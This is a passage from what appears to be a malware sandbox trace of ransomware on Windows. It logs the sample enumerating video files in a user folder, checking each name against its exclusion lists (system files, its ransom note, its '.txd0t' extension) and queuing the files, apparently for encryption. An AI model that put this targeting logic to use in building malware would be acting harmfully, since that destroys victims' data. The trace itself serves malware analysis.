ftCreationTime.dwLowDateTime=0xda7902c0, ftCreationTime.dwHighDateTime=0x1d5eff4, ftLastAccessTime.dwLowDateTime=0x7abe1d0, ftLastAccessTime.dwHighDateTime=0x1d5e88f, ftLastWriteTime.dwLowDateTime=0x7abe1d0, ftLastWriteTime.dwHighDateTime=0x1d5e88f, nFileSizeHigh=0x0, nFileSizeLow=0xdd4b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ay37U hT.mp4", cAlternateFileName="AY37UH~1.MP4")) returned 1 [0077.020] StrCmpW (psz1="ay37U hT.mp4", psz2=".") returned 1 [0077.020] StrCmpW (psz1="ay37U hT.mp4", psz2="..") returned 1 [0077.020] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0077.020] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0077.023] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="ay37U hT.mp4", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" [0077.023] PathFindExtensionW (pszPath="ay37U hT.mp4") returned=".mp4" [0077.023] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="bootsect.bak") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="iconcache.db") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="thumbs.db") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2=" ransomware ") returned 1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2=" ransom ") returned 1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="debug.txt") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="boot.ini") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="desktop.ini") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="autorun.inf") returned 1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="ntuser.dat") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="ntldr") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="ntdetect.com") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="bootfont.bin") returned -1 [0077.023] StrCmpIW (psz1="ay37U hT.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.023] PathFindExtensionW (pszPath="ay37U hT.mp4") returned=".mp4" [0077.023] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0077.023] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.023] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.023] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.023] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.023] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4" [0077.023] SetEvent (hEvent=0x3fc) returned 1 [0077.027] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61371310, ftCreationTime.dwHighDateTime=0x1d5eb09, ftLastAccessTime.dwLowDateTime=0x7f6f64c0, ftLastAccessTime.dwHighDateTime=0x1d5e81d, ftLastWriteTime.dwLowDateTime=0x7f6f64c0, ftLastWriteTime.dwHighDateTime=0x1d5e81d, nFileSizeHigh=0x0, nFileSizeLow=0x13463, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="kxtmh_DCIU7SgwmG7I.swf", cAlternateFileName="KXTMH_~1.SWF")) returned 1 [0077.027] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2=".") returned 1 [0077.032] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="..") returned 1 [0077.032] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0077.032] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0077.032] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="kxtmh_DCIU7SgwmG7I.swf", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" [0077.032] PathFindExtensionW (pszPath="kxtmh_DCIU7SgwmG7I.swf") returned=".swf" [0077.032] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="bootsect.bak") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="iconcache.db") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="thumbs.db") returned -1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2=" ransomware ") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2=" ransom ") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="debug.txt") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="boot.ini") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="desktop.ini") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="autorun.inf") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="ntuser.dat") returned -1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="ntldr") returned -1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="ntdetect.com") returned -1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="bootfont.bin") returned 1 [0077.032] StrCmpIW (psz1="kxtmh_DCIU7SgwmG7I.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.032] PathFindExtensionW (pszPath="kxtmh_DCIU7SgwmG7I.swf") returned=".swf" [0077.032] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0077.032] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.032] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.032] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.032] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.032] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf" [0077.032] SetEvent (hEvent=0x3fc) returned 1 [0077.043] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa587ac60, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0xc8cf62e0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0xc8cf62e0, ftLastWriteTime.dwHighDateTime=0x1d5e3c3, nFileSizeHigh=0x0, nFileSizeLow=0x8663, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OoNzmd4unsBSLKUjo7.avi", cAlternateFileName="OONZMD~1.AVI")) returned 1 [0077.043] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2=".") returned 1 [0077.043] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="..") returned 1 [0077.043] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0077.043] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0077.044] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="OoNzmd4unsBSLKUjo7.avi", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" [0077.044] PathFindExtensionW (pszPath="OoNzmd4unsBSLKUjo7.avi") returned=".avi" [0077.044] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="bootsect.bak") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="iconcache.db") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="thumbs.db") returned -1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2=" ransomware ") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2=" ransom ") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="debug.txt") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="boot.ini") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="desktop.ini") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="autorun.inf") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="ntuser.dat") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="ntldr") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="ntdetect.com") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="bootfont.bin") returned 1 [0077.044] StrCmpIW (psz1="OoNzmd4unsBSLKUjo7.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.044] PathFindExtensionW (pszPath="OoNzmd4unsBSLKUjo7.avi") returned=".avi" [0077.044] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0077.044] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.044] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.044] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.044] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.045] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi" [0077.045] SetEvent (hEvent=0x3fc) returned 1 [0077.053] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e1c850, ftCreationTime.dwHighDateTime=0x1d5ec3e, ftLastAccessTime.dwLowDateTime=0x90cdc3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1d7, ftLastWriteTime.dwLowDateTime=0x90cdc3c0, ftLastWriteTime.dwHighDateTime=0x1d5e1d7, nFileSizeHigh=0x0, nFileSizeLow=0xf62b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="t8NhEX.mkv", cAlternateFileName="")) returned 1 [0077.053] StrCmpW (psz1="t8NhEX.mkv", psz2=".") returned 1 [0077.053] StrCmpW (psz1="t8NhEX.mkv", psz2="..") returned 1 [0077.053] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0077.054] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0077.054] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="t8NhEX.mkv", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" [0077.054] PathFindExtensionW (pszPath="t8NhEX.mkv") returned=".mkv" [0077.054] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="bootsect.bak") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="iconcache.db") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="thumbs.db") returned -1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2=" ransomware ") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2=" ransom ") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="debug.txt") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="boot.ini") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="desktop.ini") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="autorun.inf") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="ntuser.dat") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="ntldr") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="ntdetect.com") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="bootfont.bin") returned 1 [0077.054] StrCmpIW (psz1="t8NhEX.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.054] PathFindExtensionW (pszPath="t8NhEX.mkv") returned=".mkv" [0077.054] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0077.054] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.054] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.054] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.055] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.055] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv" [0077.055] SetEvent (hEvent=0x3fc) returned 1 [0077.066] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44514d30, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x594629e0, ftLastAccessTime.dwHighDateTime=0x1d5ee81, ftLastWriteTime.dwLowDateTime=0x594629e0, ftLastWriteTime.dwHighDateTime=0x1d5ee81, nFileSizeHigh=0x0, nFileSizeLow=0x6d98, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VzUBwEA5P.avi", cAlternateFileName="VZUBWE~1.AVI")) returned 1 [0077.066] StrCmpW (psz1="VzUBwEA5P.avi", psz2=".") returned 1 [0077.066] StrCmpW (psz1="VzUBwEA5P.avi", psz2="..") returned 1 [0077.066] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0077.066] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0077.066] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="VzUBwEA5P.avi", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" [0077.066] PathFindExtensionW (pszPath="VzUBwEA5P.avi") returned=".avi" [0077.066] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="bootsect.bak") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="iconcache.db") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="thumbs.db") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2=" ransomware ") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2=" ransom ") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="debug.txt") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="boot.ini") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="desktop.ini") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="autorun.inf") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="ntuser.dat") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="ntldr") returned 1 [0077.066] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="ntdetect.com") returned 1 [0077.067] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="bootfont.bin") returned 1 [0077.067] StrCmpIW (psz1="VzUBwEA5P.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.067] PathFindExtensionW (pszPath="VzUBwEA5P.avi") returned=".avi" [0077.067] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0077.067] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.067] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.067] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.067] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.067] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi" [0077.067] SetEvent (hEvent=0x3fc) returned 1 [0077.075] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1305e060, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x62ec8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e16e, ftLastWriteTime.dwLowDateTime=0x62ec8ea0, ftLastWriteTime.dwHighDateTime=0x1d5e16e, nFileSizeHigh=0x0, nFileSizeLow=0x1143c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WxV-TMM4v.avi", cAlternateFileName="WXV-TM~1.AVI")) returned 1 [0077.075] StrCmpW (psz1="WxV-TMM4v.avi", psz2=".") returned 1 [0077.075] StrCmpW (psz1="WxV-TMM4v.avi", psz2="..") returned 1 [0077.075] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0077.075] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0077.075] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="WxV-TMM4v.avi", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" [0077.075] PathFindExtensionW (pszPath="WxV-TMM4v.avi") returned=".avi" [0077.075] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="bootsect.bak") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="iconcache.db") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="thumbs.db") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2=" ransomware ") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2=" ransom ") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="debug.txt") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="boot.ini") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="desktop.ini") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="autorun.inf") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="ntuser.dat") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="ntldr") returned 1 [0077.075] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="ntdetect.com") returned 1 [0077.076] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="bootfont.bin") returned 1 [0077.076] StrCmpIW (psz1="WxV-TMM4v.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.076] PathFindExtensionW (pszPath="WxV-TMM4v.avi") returned=".avi" [0077.076] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0077.076] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.076] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.076] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.076] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.076] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi" [0077.076] SetEvent (hEvent=0x3fc) returned 1 [0077.087] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1305e060, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x62ec8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e16e, ftLastWriteTime.dwLowDateTime=0x62ec8ea0, ftLastWriteTime.dwHighDateTime=0x1d5e16e, 